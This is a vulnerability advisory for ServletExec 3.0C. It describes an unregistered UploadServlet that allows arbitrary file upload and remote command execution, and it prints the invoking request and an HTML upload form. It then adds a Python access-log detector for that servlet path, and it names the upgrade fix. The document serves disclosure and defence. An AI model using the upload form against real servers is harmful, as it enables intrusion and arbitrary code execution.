Vulnerability

    ServletExec

Affected

    Unify eWave ServletExec 3.0C

Description

    Following is based on a Foundstone FS-103100-16-SRVX Security Advisory by Shreeraj Shah, Saumil Shah and Stuart McClure.

    Unify's eWave ServletExec is a JSP and a Java Servlet engine which is used as a plug-in to popular web servers like Apache, IIS, Netscape, etc. ServletExec has a servlet called "UploadServlet" in its server side classes. UploadServlet, when invokable, allows an attacker to upload any file to any directory on the server. The uploaded file may have code that can later be executed on the server, leading to remote command execution.

    ServletExec has com.unify.ewave.servletexec.UploadServlet residing in its server side classes. Even though this servlet is not registered, it can be invoked on the server side by the following HTTP requests:

        nc 10.0.0.1 80
        GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0

    or

        http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet

    An attacker can create an HTML form on his or her local system to use this servlet to upload arbitrary files on to the server. A sample of such a form is given below:

        <FORM METHOD=POST ENCTYPE='multipart/form-data'
              ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet'>
        <P>
        Upload Directory: <INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
        <P>
        File to Upload: <INPUT TYPE=FILE SIZE=35 NAME=File1>
        <P>
        <INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
        </FORM>

    Using this upload form, an attacker can upload a file, for example a JSP file, that can run arbitrary commands on the server side.

Solution

    Upgrade to ServletExec version 3.0E, available at:

        http://www.servletexec.com/downloads/
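
A log check for the request path described above, as an added example that is not part of the Foundstone advisory: it scans web server access-log lines for requests to the UploadServlet invoker path and separates probes from POSTs that were answered with a 2xx status. The Common Log Format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Servlet class named in the advisory, reached through the /servlet/ invoker path.
# Compared in lowercase so differently-cased forms of the same path also match.
TARGET = "/servlet/com.unify.ewave.servletexec.uploadservlet"

# Assumed log layout (Common/Combined Log Format):
# host ident user [time] "METHOD URI PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def normalise(uri):
    """Decode percent-escapes (twice, to cover double encoding), drop the query
    string and path parameters, collapse duplicate slashes, and lowercase."""
    path = unquote(unquote(uri)).split("?", 1)[0].split(";", 1)[0]
    return re.sub(r"/+", "/", path).lower()

def find_upload_servlet_hits(lines):
    """Return one dict per logged request that addressed the UploadServlet path."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a parseable access-log line
        host, when, method, uri, status = m.groups()
        if not normalise(uri).startswith(TARGET):
            continue
        # A POST answered with 2xx means a file may have been written to disk
        # and the host should be examined for unexpected files (e.g. new JSPs).
        upload = method.upper() == "POST" and status.startswith("2")
        hits.append({"host": host, "time": when, "method": method,
                     "status": int(status),
                     "severity": "possible-upload" if upload else "probe"})
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [01/Nov/2000:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [01/Nov/2000:10:02:13 +0000] "GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Nov/2000:10:02:40 +0000] "POST /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0" 200 230',
    '192.0.2.91 - - [01/Nov/2000:11:15:02 +0000] "POST /servlet/com.unify.ewave.servletexec.%55ploadServlet HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for hit in find_upload_servlet_hits(SAMPLE):
        print(hit)
```

Any "possible-upload" hit on a server still running 3.0C warrants a file-system review in addition to the upgrade, since the upload itself leaves no other trace in the access log.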